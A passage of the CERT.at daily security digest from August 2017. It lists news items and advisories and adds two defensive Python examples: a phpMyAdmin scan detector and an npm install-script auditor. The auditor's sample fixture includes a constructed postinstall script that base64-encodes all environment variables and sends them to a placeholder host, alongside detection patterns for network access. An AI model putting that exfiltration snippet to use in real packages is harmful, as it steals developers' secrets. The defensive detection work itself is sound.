Offenbar nur Hinhaltetaktik – Kriminelle: Versprechen wurden gebrochen
---------------------------------------------
http://derstandard.at/2000062546236
∗∗∗ Pupil uncovers Google flaw, pockets 10,000 dollars ∗∗∗
---------------------------------------------
Bug bounty programme brings unexpected windfall to a pupil from Uruguay
---------------------------------------------
http://derstandard.at/2000062559352
=====================
= Advisories =
=====================
∗∗∗ DSA-3929 libsoup2.4 - security update ∗∗∗
---------------------------------------------
Aleksandar Nikolic of Cisco Talos discovered a stack-based buffer overflow vulnerability in libsoup2.4, a HTTP library implementation in C. A remote attacker can take advantage of this flaw by sending a specially crafted HTTP request to cause an application using ..
---------------------------------------------
https://www.debian.org/security/2017/dsa-3929
∗∗∗ DSA-3934 git - security update ∗∗∗
---------------------------------------------
Joern Schneeweisz discovered that git, a distributed revision control system, did not correctly handle maliciously constructed ssh:// URLs. This allowed an attacker to run ..
---------------------------------------------
https://www.debian.org/security/2017/dsa-3934
∗∗∗ SIMPlight SCADA Software ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-01
∗∗∗ Solar Controls Heating Control Downloader (HCDownloader) ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-02
∗∗∗ Solar Controls WATTConfig M Software ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03
∗∗∗ Fuji Electric Monitouch V-SFT ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-04
∗∗∗ Symantec Messaging Gateway RCE and CSRF ∗∗∗
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2017&suid=20170810_00
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 09-08-2017 18:00 − Thursday 10-08-2017 18:00
Handler: Alexander Riepl
Co-Handler:
=====================
= News =
=====================
∗∗∗ IT industry: "Security package" endangers cybersecurity ∗∗∗
---------------------------------------------
In an open letter, representatives of the Austrian IT industry warn of dangers to cybersecurity from the "Sicherheitspaket" (security package) planned by the ÖVP.
---------------------------------------------
https://futurezone.at/netzpolitik/it-branche-sicherheitspaket-gefaehrdet-cy…
∗∗∗ Mystery Company Offers $250,000 Bounty for VM Escape Vulnerabilities ∗∗∗
---------------------------------------------
An unnamed firm is paying up to $250,000 for vulnerabilities related to its virtualization platform.
---------------------------------------------
http://threatpost.com/mystery-company-offers-250000-bounty-for-vm-escape-vu…
∗∗∗ SAP Patch Tuesday Update Resolves 19 Flaws, Three High Severity ∗∗∗
---------------------------------------------
SAP released 19 patches on Tuesday, including a trio of vulnerabilities marked high severity in its business management software.
---------------------------------------------
http://threatpost.com/sap-patch-tuesday-update-resolves-19-flaws-three-high…
∗∗∗ Salesforce sacks two top security engineers for their DEF CON talk ∗∗∗
---------------------------------------------
Revealing penetration-testing tool sealed staffers' fate. Salesforce fired two of its senior security engineers after they revealed details of an internal tool for testing IT defenses at DEF CON last month.…
---------------------------------------------
www.theregister.co.uk/2017/08/10/salesforce_fires_its_senior_security_engin…
∗∗∗ Federal Criminal Police Office (Bundeskriminalamt, BK) warns Austrian companies about CEO fraud ∗∗∗
---------------------------------------------
http://www.bmi.gv.at/cms/bk/_news/start.aspx?id=534C4362372B557557664D3D&pa…
∗∗∗ The Shadow Brokers Have Made Almost $90,000 Selling Hacking Tools by Subscription, Researcher Says ∗∗∗
---------------------------------------------
An anonymous researcher has been able to identify the email address of people who have subscribed to the monthly dump service by the mysterious hacking group.
---------------------------------------------
https://motherboard.vice.com/en_us/article/neejqw/the-shadow-brokers-have-m…
∗∗∗ Alleged vDOS Operators Arrested, Charged ∗∗∗
---------------------------------------------
Two young Israeli men alleged by this author to have co-founded vDOS -- until recently the largest and most profitable cyber attack-for-hire service online -- were arrested and formally indicted this week in Israel on conspiracy and hacking charges.
---------------------------------------------
https://krebsonsecurity.com/2017/08/alleged-vdos-operators-arrested-charged/
=====================
= Advisories =
=====================
∗∗∗ Session Cache API - Critical - Multiple vulnerabilities - DRUPAL-SA-CONTRIB-2017-065 ∗∗∗
---------------------------------------------
https://www.drupal.org/node/2900951
∗∗∗ Facebook Like Button - Moderately Critical - XSS - DRUPAL-SA-CONTRIB-2017-066 ∗∗∗
---------------------------------------------
https://www.drupal.org/node/2900966
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 08-08-2017 18:00 − Wednesday 09-08-2017 18:00
Handler: Alexander Riepl
Co-Handler: Olaf Schwarz
=====================
= News =
=====================
∗∗∗ Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read ∗∗∗
---------------------------------------------
For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out.
---------------------------------------------
http://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-a…
∗∗∗ Engineering Firm Leaks Sensitive Data on Dell, SBC and Oracle ∗∗∗
---------------------------------------------
Power Quality Engineering publicly exposed sensitive electrical infrastructure data on the public internet tied to Dell Technologies, SBC, Freescale, Oracle, Texas Instruments and the City of Austin.
---------------------------------------------
http://threatpost.com/engineering-firm-leaks-sensitive-data-on-dell-sbc-and…
∗∗∗ WTF is Mughthesec!? poking on a piece of undetected adware ∗∗∗
---------------------------------------------
Some undetected adware named "Mughthesec" is infecting Macs... let's check it out!
---------------------------------------------
https://objective-see.com/blog/blog_0x20.html
∗∗∗ How are people fooled by this? Email to sign a contract provides malware instead. ∗∗∗
---------------------------------------------
https://isc.sans.edu/diary/rss/22696
∗∗∗ Security Afterworks – Best of Summer of Security Conferences ∗∗∗
---------------------------------------------
September 14, 2017 - 4:30 pm - 6:00 pm SBA Research Favoritenstraße 16 1040 Wien
---------------------------------------------
https://www.sba-research.org/events/security-afterworks-best-of-summer-of-s…
∗∗∗ Chip Off the Old EMV ∗∗∗
---------------------------------------------
Recently, Jason Knowles of ABC 7's I-Team asked us, "What is the security risk if your EMV chip falls off your credit card? What could someone do with that?"
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/Chip-Off-the-Old-EMV/
∗∗∗ Marcus Hutchins free for now as infosec world rallies around suspected banking malware dev ∗∗∗
---------------------------------------------
WannaCry ransomware killer due in court August 14. British security researcher Marcus Hutchins was released on Monday from a Nevada jail after posting bail.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2017/08/08/marcus_hutc…
∗∗∗ FBIs spyware-laden video claims another scalp: Alleged sextortionist charged ∗∗∗
---------------------------------------------
Feds' NIT punches through Tor anonymity shield. The FBI's preferred tool for unmasking Tor users has brought about another arrest: a suspected sextortionist who allegedly tricked young girls into sharing nude pics of themselves and then blackmailed his victims.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2017/08/09/fbis_spywar…
∗∗∗ Critical Security Fixes from Adobe, Microsoft ∗∗∗
---------------------------------------------
Adobe has released updates to fix at least 67 vulnerabilities in its Acrobat, Reader and Flash Player software. Separately, Microsoft today issued patches to plug 48 security holes in Windows and other Microsoft products. If you use Windows or Adobe products, it's time once again to get your patches on. More than two dozen of the vulnerabilities fixed in today's Windows patch bundle address "critical" ..
---------------------------------------------
https://krebsonsecurity.com/2017/08/critical-security-fixes-from-adobe-micr…
∗∗∗ Special characters, digits and co.: Inventor regrets password rules ∗∗∗
---------------------------------------------
In 2003 Bill Burr drafted password rules for US authorities that soon caught on globally – and are considered insecure today
---------------------------------------------
http://derstandard.at/2000062463061
=====================
= Advisories =
=====================
∗∗∗ OSIsoft PI Integrator ∗∗∗
---------------------------------------------
This advisory contains mitigation details for cross-site scripting and improper authorization vulnerabilities in OSIsoft’s PI Integrator for SAP HANA 2016, PI Integrator for Business Analytics 2016 - Data Warehouse, PI Integrator for Business Analytics 2016 - Business Intelligence, PI Integrator for Business Analytics and SAP HANA SQL Utility 2016, and PI Integrator for Microsoft Azure 2016.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-220-01
∗∗∗ Moxa SoftNVR-IA Live Viewer ∗∗∗
---------------------------------------------
This advisory contains mitigation details for an uncontrolled search path element vulnerability in Moxa’s SoftNVR-IA Live Viewer.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-220-02
∗∗∗ FortiOS IKE VendorID version information disclosure ∗∗∗
---------------------------------------------
http://fortiguard.com/psirt/FG-IR-17-073
∗∗∗ FortiWeb SNMPv3 user password viewable in HTML source code ∗∗∗
---------------------------------------------
http://fortiguard.com/psirt/FG-IR-17-162
∗∗∗ Security vulnerabilities in several Jenkins plugins ∗∗∗
---------------------------------------------
https://heise.de/-3796342
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 07-08-2017 18:00 − Tuesday 08-08-2017 18:00
Handler: Alexander Riepl
Co-Handler:
=====================
= News =
=====================
∗∗∗ Hotspot Shield: VPN provider allegedly spies on users via JavaScript ∗∗∗
---------------------------------------------
The VPN provider Hotspot Shield allegedly spies on its users through JavaScript elements and advertising, even though it claims the exact opposite. A US civil liberties organisation has levelled this accusation at the company and filed a complaint with the FTC.
---------------------------------------------
https://www.golem.de/news/hotspot-shield-vpn-provider-soll-javascript-in-ve…
∗∗∗ Google Patches 10 Critical Bugs in August Android Security Bulletin ∗∗∗
---------------------------------------------
Google's August Android Security Bulletin featured patches for nearly a dozen remote code execution bugs impacting Google's Pixel and Nexus handsets.
---------------------------------------------
http://threatpost.com/google-patches-10-critical-bugs-in-august-android-sec…
∗∗∗ Microsoft to remove WoSign and StartCom certificates in Windows 10 ∗∗∗
---------------------------------------------
Microsoft has concluded that the Chinese Certificate Authorities (CAs) WoSign and StartCom have failed to maintain the standards required by our Trusted Root Program. Observed unacceptable security practices include back-dating SHA-1 certificates, ..
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wos…
∗∗∗ How Chat App Discord Is Abused by Cybercriminals to Attack ROBLOX Players ∗∗∗
---------------------------------------------
Cybercriminals targeting gamers are nothing new. We’ve reported many similar incidents in the past, from fake game apps to real-money laundering through online game currencies. Usually the aim is simple: to steal personal information and monetize it. And ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/chat-app-discord…
∗∗∗ Practical Analysis of the Cybersecurity of European Smart Grids ∗∗∗
---------------------------------------------
This paper summarizes the experience gained during a series of practical cybersecurity assessments of various components of Europe’s smart electrical grids.
---------------------------------------------
http://digitalsubstation.com/en/2017/08/07/practical-analysis-of-nbsp-the-c…
∗∗∗ Google warns Chrome extension developers about phishing emails ∗∗∗
---------------------------------------------
Scammers are hunting for the login credentials of developer accounts in order to contaminate Chrome extensions with malicious code and then distribute them, Google warns.
---------------------------------------------
https://heise.de/-3795160
∗∗∗ Hackers extort HBO with further "Game of Thrones" episodes ∗∗∗
---------------------------------------------
Extortionists have published the script of episode 5 of season 7 and are demanding money to refrain from further publications.
---------------------------------------------
http://derstandard.at/2000062391623
∗∗∗ IMF warns: cyber attacks endanger global financial stability ∗∗∗
---------------------------------------------
Attacks by hackers and criminals are becoming ever more sophisticated.
---------------------------------------------
http://derstandard.at/2000062403498
=====================
= Advisories =
=====================
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
Adobe has published security bulletins for Adobe Flash Player (APSB17-23), Adobe Acrobat and Reader (APSB17-24), Adobe Experience Manager (APSB17-26) and Adobe Digital Editions (APSB17-27). Adobe recommends users update their product installations to the ..
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1480
∗∗∗ Vulnerability in F2FS File System Leads To Memory Corruption on Android, Linux ∗∗∗
---------------------------------------------
August’s Android Security Bulletin includes three file system vulnerabilities (CVE-2017-10663, CVE-2017-10662, and CVE-2017-0750) that were discovered by Trend Micro researchers. These vulnerabilities could cause memory corruption on the affected devices, ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/vulnerability-f2…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 04-08-2017 18:00 − Monday 07-08-2017 18:00
Handler: Alexander Riepl
Co-Handler:
=====================
= News =
=====================
∗∗∗ You Can Trick Self-Driving Cars by Defacing Street Signs ∗∗∗
---------------------------------------------
A team of eight researchers has discovered that by altering street signs, an adversary could confuse self-driving cars and cause their machine-learning systems to misclassify signs and take ..
---------------------------------------------
https://www.bleepingcomputer.com/news/security/you-can-trick-self-driving-c…
∗∗∗ Password manager: LastPass now twice as expensive ∗∗∗
---------------------------------------------
Anyone using the LastPass password manager will have to pay more in future. Users of the free version lose some features. In addition, the company announces ..
---------------------------------------------
https://www.golem.de/news/passwortmanager-lastpass-ab-sofort-doppelt-so-teu…
∗∗∗ Links in phishing-like emails lead to tech support scam ∗∗∗
---------------------------------------------
Tech support scams continue to evolve, with scammers exploring more ways to reach potential victims. Recently, we have observed spam campaigns distributing links that lead to tech support scam websites. Anti-spam filters in Microsoft Exchange ..
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2017/08/07/links-in-phishing-like-…
∗∗∗ Increase of phpMyAdmin scans ∗∗∗
---------------------------------------------
PMA (or phpMyAdmin) is a well-known MySQL front-end written in PHP that "brings MySQL to the web", as stated on its web site[1]. The tool is very popular amongst web developers because it helps to maintain databases just by using a web browser. This also means that the front-end might be publicly exposed! It is a common finding in many penetration tests to find an old PMA interface left behind by an admin.
---------------------------------------------
https://isc.sans.edu/diary/rss/22688
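The scans the diary describes show up in a web server's access log as short bursts of requests for the usual phpMyAdmin directory names from a single source. The script below, an added example that is not part of the ISC diary or the phpMyAdmin project, parses combined-format access log lines, flags requests for such paths (the path list is an assumption compiled for this example; extend it with whatever your own scanners try) and reports each source IP that probed at least a threshold number of them. It also counts probes the server answered with 200, because a scanner that received a 200 has just found an exposed interface. The log lines are constructed sample data using RFC 5737 documentation addresses.

```python
"""Flag source IPs probing for phpMyAdmin in web-server access logs.

Added example: the path list and the log lines below are constructed for this
demonstration; they are not taken from the ISC diary.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Directory names scanners typically try when hunting for a PMA install
# (assumption: compiled for this example, extend to taste). A version suffix
# such as /phpMyAdmin-4.7.0/ is accepted, other suffixes are not, so a page
# like /blog/phpmyadmin-tutorial is not flagged.
PMA_PATH_RE = re.compile(
    r"/(?:phpmyadmin(?:-[\d.]+)?|pma|myadmin|mysqladmin|dbadmin)(?:/|$)",
    re.IGNORECASE,
)

# Apache/nginx combined log format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict with ip/time/method/path/status, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Drop the query string and percent-decode so /%70hpmyadmin/ is seen as /phpmyadmin/.
    rec["path"] = unquote(rec["path"].split("?", 1)[0])
    rec["status"] = int(rec["status"])
    return rec


def is_pma_probe(path):
    return PMA_PATH_RE.search(path) is not None


def find_pma_scanners(lines, threshold=3):
    """Map each IP with >= threshold PMA probes to its probe count, distinct paths and 200 answers.

    A non-zero "hits" value means the server answered a PMA path with 200, i.e. an
    interface may really be exposed and deserves a look before the scanner uses it.
    """
    probes = defaultdict(list)
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_pma_probe(rec["path"]):
            continue
        probes[rec["ip"]].append(rec["path"])
        if rec["status"] == 200:
            hits[rec["ip"]] += 1
    return {
        ip: {"probes": len(paths), "paths": sorted(set(paths)), "hits": hits[ip]}
        for ip, paths in probes.items()
        if len(paths) >= threshold
    }


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Aug/2017:10:01:02 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Aug/2017:10:01:03 +0200] "GET /pma/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Aug/2017:10:01:03 +0200] "GET /phpMyAdmin-4.7.0/scripts/setup.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Aug/2017:10:01:04 +0200] "GET /myadmin/index.php?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Aug/2017:10:05:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "curl/7.55.1"',
    '198.51.100.23 - - [07/Aug/2017:10:05:01 +0200] "GET /%70hpmyadmin/ HTTP/1.1" 404 209 "-" "curl/7.55.1"',
    '192.0.2.9 - - [07/Aug/2017:10:07:00 +0200] "GET /blog/phpmyadmin-tutorial HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in sorted(find_pma_scanners(SAMPLE_LOG).items()):
        print(f"{ip}: {info['probes']} probes, {info['hits']} answered 200: {', '.join(info['paths'])}")
```

Run over the sample, only 203.0.113.7 crosses the default threshold of three probes, and one of its requests was answered with 200, which is the line worth acting on. Lowering the threshold to 1 also surfaces 198.51.100.23, whose single percent-encoded probe is only caught because the path is decoded before matching.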
∗∗∗ ESET Spreading FUD About Torrent Files, Clients ∗∗∗
---------------------------------------------
An anonymous reader writes: ESET has taken fear mongering, something that some security firms continue to do, to a new level by issuing a blanket warning to users to view torrent files and clients as a threat. The warning came from the company's so-called security evangelist Ondrej Kubovic, (who used extremely patchy data to try and ..
---------------------------------------------
https://it.slashdot.org/story/17/08/04/1938242/eset-spreading-fud-about-tor…
∗∗∗ Tale of the Two Payloads – TrickBot and Nitol ∗∗∗
---------------------------------------------
A couple of weeks ago, we observed the Necurs botnet distributing a new malware spam campaign with a payload combo that includes Trickbot and Nitol. Trickbot is a banking trojan ..
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%e2…
∗∗∗ Cerber ransomware said to steal bitcoins ∗∗∗
---------------------------------------------
Apparently the ransom is not enough for the developers of the Cerber malware: the encryption trojan is now said to grab Bitcoin wallets and passwords as well.
---------------------------------------------
https://heise.de/-3793763
∗∗∗ FireEye denies hacker attack on US security firm Mandiant ∗∗∗
---------------------------------------------
An unknown hacker boasted of having compromised Mandiant's network and employees' computers. FireEye now states that this is not true.
---------------------------------------------
https://heise.de/-3794454
∗∗∗ Hacker camp SHA2017: All Computers are broken ∗∗∗
---------------------------------------------
ACAB may mean something else in other circles, but for hackers the matter is clear: All Computers are broken. This became evident at the Dutch hacker camp SHA2017.
---------------------------------------------
https://heise.de/-3794575
∗∗∗ Background: the story of Juniper's expropriated backdoor ∗∗∗
---------------------------------------------
In a multiple award-winning paper, researchers deliver a kind of crypto thriller. They meticulously document how the network equipment maker Juniper built a hidden backdoor into its products, and how an external attacker later repurposed it.
---------------------------------------------
https://heise.de/-3794610
∗∗∗ Fake GMX message: account blocked ∗∗∗
---------------------------------------------
Criminals are sending a fake GMX message with the subject "GMX Konto Gesperrt" (GMX account blocked). In it they claim that the recipient's e-mail account will be deleted. Customers who want to prevent this are supposed to enter their credentials on a fake GMX website ..
---------------------------------------------
https://www.watchlist-internet.at/phishing/gefaelschte-gmx-nachricht-konto-…
=====================
= Advisories =
=====================
∗∗∗ DSA-3926 chromium-browser - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2017/dsa-3926
∗∗∗ DSA-3925 qemu - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2017/dsa-3925
∗∗∗ Eaton ELCSoft Vulnerabilities ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-216-01-0
∗∗∗ WP Live Chat Support <= 7.1.04 - Cross-Site Scripting (XSS) ∗∗∗
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8880
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 03-08-2017 18:00 − Friday 04-08-2017 18:00
Handler: Petr Sikuta
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Week In Review – 4th August 2017 ∗∗∗
---------------------------------------------
Creating Fake Identities. Everything today seems to be linked to your identity; or perhaps more specifically, to your digital identity. While safeguarding one's identity is important, it is equally important to find ways to stop people from creating fake identities. Kevin Mitnick belonged to an earlier generation that many of this generation's up-and-comers may not have heard of. While today he is a respectable information security professional, he wasn’t always quite a white hat, and [...]
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/week-in-review-4th-aug…
∗∗∗ JavaScript Packages Caught Stealing Environment Variables ∗∗∗
---------------------------------------------
On August 1, npm Inc. — the company that runs the biggest JavaScript package repository — removed 38 JavaScript npm packages that were caught stealing environment variables from infected projects. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/javascript-packages-caught-s…
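The excerpt does not say how the removed packages harvested environment variables. The audit below, an added example that is neither the article's analysis nor npm's own tooling, assumes the pattern a practitioner would check for first: a lifecycle script (preinstall, install, postinstall, prepare) that npm runs automatically during installation and that reads process.env and talks to the network. It walks a set of package manifests, rates each hook by what the script it launches does, and lists the worst first. The manifests and script sources are constructed sample data, the package names are fictional, and the regexes are a heuristic rather than a parser of JavaScript.

```python
"""Audit npm package manifests for install-time scripts that read the environment.

Added example: the manifests and script sources below are constructed for this
demonstration; the package names are fictional and the heuristics are an
assumption about how such packages typically behave, not the article's analysis.
"""
import re

# npm runs these scripts automatically during `npm install`, without asking the user.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

ENV_RE = re.compile(r"process\.env\b")
NET_RE = re.compile(
    r"require\(['\"](?:https?|net|dns)['\"]\)"   # Node networking modules
    r"|\bfetch\s*\("                              # fetch()
    r"|\bchild_process\b"                         # shelling out (curl, wget, ...)
)
NODE_SCRIPT_RE = re.compile(r"\bnode\s+(\S+\.js)\b")


def audit_package(name, manifest, files):
    """Return one finding per lifecycle hook declared in `manifest`.

    `files` maps a path inside the package to its source text. If the hook runs a
    .js file that ships with the package, that file is searched for environment
    reads and network access: both together rate "high", either alone "medium",
    a hook whose script is not inspectable (e.g. node-gyp) stays "info".
    """
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        finding = {"package": name, "hook": hook, "command": cmd,
                   "env": False, "network": False, "severity": "info"}
        m = NODE_SCRIPT_RE.search(cmd)
        src = files.get(m.group(1).lstrip("./")) if m else None
        if src is not None:
            finding["env"] = ENV_RE.search(src) is not None
            finding["network"] = NET_RE.search(src) is not None
        if finding["env"] and finding["network"]:
            finding["severity"] = "high"
        elif finding["env"] or finding["network"]:
            finding["severity"] = "medium"
        findings.append(finding)
    return findings


def audit_all(packages):
    """packages: {name: (manifest_dict, {path: source})} -> findings, worst first."""
    order = {"high": 0, "medium": 1, "info": 2}
    findings = [f for name, (manifest, files) in packages.items()
                for f in audit_package(name, manifest, files)]
    return sorted(findings, key=lambda f: (order[f["severity"]], f["package"]))


# Constructed sample: a clean package, a legitimate native build step, and one
# that posts every environment variable to a remote host at install time.
SAMPLE_PACKAGES = {
    "good-dep": ({"name": "good-dep", "version": "1.0.0",
                  "scripts": {"test": "mocha"}}, {}),
    "native-thing": ({"name": "native-thing", "version": "2.1.0",
                      "scripts": {"install": "node-gyp rebuild"}}, {}),
    "suspicious-example": (
        {"name": "suspicious-example", "version": "5.0.1",
         "scripts": {"postinstall": "node ./package-setup.js"}},
        {"package-setup.js":
            "const https = require('https');\n"
            "const blob = Buffer.from(JSON.stringify(process.env)).toString('base64');\n"
            "https.get('https://collector.example.invalid/?d=' + blob);\n"},
    ),
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_PACKAGES):
        print(f"[{f['severity']:6}] {f['package']} {f['hook']}: {f['command']}"
              f" (env={f['env']}, network={f['network']})")
```

The native build step is reported too, because any lifecycle hook is worth knowing about, but only the fictional package that reads process.env and opens an HTTPS connection is rated high. Independently of such audits, npm's own `--ignore-scripts` flag (or `npm config set ignore-scripts true`) stops lifecycle scripts from running at all, at the cost of breaking packages that genuinely need a build step.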
∗∗∗ Infected Chrome extension infects one million users ∗∗∗
---------------------------------------------
The Web Developer extension was hijacked, replaced with a version containing malware and distributed to users.
---------------------------------------------
https://futurezone.at/digital-life/verseuchte-chrome-erweiterung-infiziert-…
∗∗∗ Arrest after Black Hat: WannaCry hacker allegedly developed banking trojan ∗∗∗
---------------------------------------------
A British security researcher and hacker has been arrested in the USA. The 23-year-old had unintentionally helped to slow the spread of WannaCry. He is alleged to have been involved in developing the Kronos banking trojan.
---------------------------------------------
https://www.golem.de/news/wanna-cry-sicherheitsforscher-malwaretech-in-den-…
∗∗∗ Weekly Security Roundup ∗∗∗
---------------------------------------------
This week, we’ve published an article about session hijacking, a dangerous hacking method that takes control of a user’s account as they are live and using it. Security articles of the week (July 31st – August 4th, 2017) The biggest story from the beginning of this week was the HBO hack that ended up with leaked [...]
---------------------------------------------
https://heimdalsecurity.com/blog/weekly-security-roundup/
∗∗∗ Cisco closes super-admin hole ∗∗∗
---------------------------------------------
The network equipment maker provides eleven security updates for various products. The vulnerabilities are said to pose a medium to high risk.
---------------------------------------------
https://heise.de/-3793025
=====================
= Advisories =
=====================
∗∗∗ Upcoming Security Updates for Adobe Reader and Acrobat (APSB17-24) ∗∗∗
---------------------------------------------
A prenotification Security Advisory has been posted regarding upcoming Adobe Reader and Acrobat updates scheduled for Tuesday, August 8, 2017.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1478
∗∗∗ Schneider Electric Pro-face GP-Pro EX ∗∗∗
---------------------------------------------
This advisory contains mitigation details for an uncontrolled search path element vulnerability in Schneider Electric’s Pro-face GP-Pro EX.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-215-01
∗∗∗ IBM Security Bulletin: A vulnerability in libtirpc affects PowerKVM ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=isg3T1025258
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security SiteProtector System ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22004331
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere Extreme Scale ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22005297
∗∗∗ IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos TM1 ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006551
∗∗∗ IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos Insight ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006550